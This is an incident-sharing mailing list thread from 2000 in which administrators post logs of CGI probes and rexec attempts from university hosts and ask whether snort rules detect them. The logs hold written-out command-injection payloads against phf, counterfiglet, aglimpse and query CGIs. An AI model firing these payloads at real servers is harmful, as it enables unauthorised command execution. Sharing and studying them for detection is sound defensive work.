Re: Scans from udel.edu and tue.nl

[fernando () BN PT (Fernando Cardoso)]

I've seen the same here. 

Here´s what snort get from the probes.

Mar 20 02:55:05 snort: WEB-CGI-TEST-CGIprobe!: 128.175.13.74:48153 ->
x.x.x.x:80
Mar 20 05:15:55 snort: WEB-CGI-PHF CGI access attempt:
128.175.13.74:59064 -> x.x.x.x:80
Mar 20 06:11:25 snort: WEB-CGI-Aglimpse CGI access attempt:
128.175.13.74:58311 -> x.x.x.x:80
Mar 21 05:41:16 snort: WEB-CGI-sh: 128.175.13.74:57899 -> x.x.x.x:80
Mar 21 06:25:26 snort: WEB-CGI-query: 128.175.13.74:34372 -> x.x.x.x:80

I've compared this with the web server logs and my snort rulebase only
missed a couple probes (counterfiglet and perl).

______________________________________________
Fernando Cardoso
Network Administrator
National Library of Portugal 

> -----Original Message-----
> From: Gregor Sfiligoj [mailto:gregor () TMEDIA IT]
> Sent: quarta-feira, 22 de Março de 2000 12:39
> To: INCIDENTS () SECURITYFOCUS COM
> Subject: R: Scans from udel.edu and tue.nl
>
>
> I have noted the same from strauss.udel.edu.
>
> 128.175.13.74 - - [19/Mar/2000:17:53:24 +0100] "GET
> /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet
> _};uname%20-a;
> id;w;echo%20{_end-counterfiglet_};echo HTTP/1.0" 404 301
> 128.175.13.74 - - [20/Mar/2000:03:58:47 +0100] "POST /cgi-bin/test-cgi
> HTTP/1.0" 500 522
> 128.175.13.74 - - [20/Mar/2000:06:17:50 +0100] "POST
> /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 205
> 128.175.13.74 - - [20/Mar/2000:07:12:58 +0100] "GET
> /cgi-bin/aglimpse/80|IFS=_;CMD=_echo\;echo_id-aglimpse\;uname_
> -a\;id;eval$CM
> D; HTTP/1.0" 404 271
> 128.175.13.74 - - [21/Mar/2000:01:00:05 +0100] "POST 
> /cgi-bin/perl HTTP/1.0"
> 404 206
> 128.175.13.74 - - [21/Mar/2000:06:42:23 +0100] "POST 
> /cgi-bin/sh HTTP/1.0"
> 404 204
> 128.175.13.74 - - [21/Mar/2000:07:26:45 +0100] "GET
> /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22
> %2F%75%73%72%2
> F%62%69%6E%2F%69%64%22%2D%2D%3E HTTP/1.0" 404 207
>
> Are all this covered by arachNIDS library for snort?
>
> gregor sfiligoj
> gregor () tmedia it
>
> -----Messaggio originale-----
> Da: Incidents Mailing List 
> [mailto:INCIDENTS () SECURITYFOCUS COM]Per conto
> di Jose Nazario
> Inviato: martedì 21 marzo 2000 17.59
> A: INCIDENTS () SECURITYFOCUS COM
> Oggetto: Scans from udel.edu and tue.nl
>
>
> Hi,
>
>       [Local hostnames have been munged, outside addresses are real]
>
> I wanted to write a quick note to you guys about two sets of 
> web scans we
> have seen on the CWRU campus these past few days. The first 
> is from the
> University of Delaware, with some classic cgi-bin attempts:
>
> strauss.udel.edu - - [19/Mar/2000:11:41:23 -0500] "GET
> /cgi-bin/counterfiglet/nc/f=;echo;echo%20{_begin-counterfiglet
> _};uname%20-a;
> id;w;echo%20{_end-counterfiglet_};echo
> HTTP/1.0" 404 301
> strauss.udel.edu - - [19/Mar/2000:21:44:53 -0500] "POST 
> /cgi-bin/test-cgi
> HTTP/1.0" 404 210
> strauss.udel.edu - - [20/Mar/2000:18:47:53 -0500] "POST /cgi-bin/perl
> HTTP/1.0" 404 206
> strauss.udel.edu - - [21/Mar/2000:00:31:37 -0500] "POST /cgi-bin/sh
> HTTP/1.0" 404 204
> strauss.udel.edu - - [21/Mar/2000:01:16:06 -0500] "GET
> /cgi-bin/query?x=%3C%21%2D%2D%23%65%78%65%63%20%63%6D%64%3D%22
> %2F%75%73%72%2
> F%62%69%6E%2F%69%64%22%2D%2D%3E
> HTTP/1.0" 404 207
>
> The second set is from the Netherlands, who just got back to me this
> morning regarding two comprimised accounts. They also tried 
> some cgi-bin
> scans to gain access to the machine, as well as some rexec 
> attempts and
> what appears to be a trojan horse access attempt:
>
> webcache.tue.nl - - [19/Mar/2000:00:49:12 -0500] "POST /cgi-bin/perl
> HTTP/1.0" 404 206
> webcache.tue.nl - - [19/Mar/2000:00:49:12 -0500] "POST
> /cgi-bin/phf?Qname=x%0a/bin/sh+-s%0a HTTP/1.0" 404 205
>
> Mar 19 04:23:04 server kernel: TCP connection rejected from
> 131.155.69.100, port 5556
> Mar 19 05:48:22 server kernel: TCP connection rejected from
> 131.155.69.100, port 512
> Mar 19 08:28:46 server kernel: TCP connection rejected from
> 131.155.69.100, port 512
>
> And on another machine:
>
> Mar 18 23:51:35 4C:workstation rexecd[14591]: refused connect from
> svstud.win.tue.nl
> Mar 19 01:03:14 4C:workstation rexecd[14635]: refused connect from
> svstud.win.tue.nl
> Mar 19 01:49:15 4C:workstation rexecd[14655]: refused connect from
> svstud.win.tue.nl
> Mar 19 04:28:21 4C:workstation rexecd[14731]: refused connect from
> svstud.win.tue.nl
> Mar 19 05:36:30 4C:workstation rexecd[14774]: refused connect from
> svstud.win.tue.nl
> Mar 19 05:39:34 4C:workstation rexecd[14775]: refused connect from
> svstud.win.tue.nl
> Mar 19 08:20:00 4C:workstation rexecd[14857]: refused connect from
> svstud.win.tue.nl
> Mar 19 09:23:25 4C:workstation rexecd[14897]: refused connect from
> svstud.win.tue.nl
>
> Both were campus wide probes for web access via cgi-bin and 
> rexecd access
> (port 512/TCP).
>
> It's likely that other readers have seen these problems as well.
>
> jose nazario                                  
> jose () biochemistry cwru edu
> PGP fingerprint: 89 B0 81 DA 5B FD 7E 00  99 C3 B2 CD 48 A0 07 80
> Public key available at http://biocserver.cwru.edu/~jose/pgp-key.asc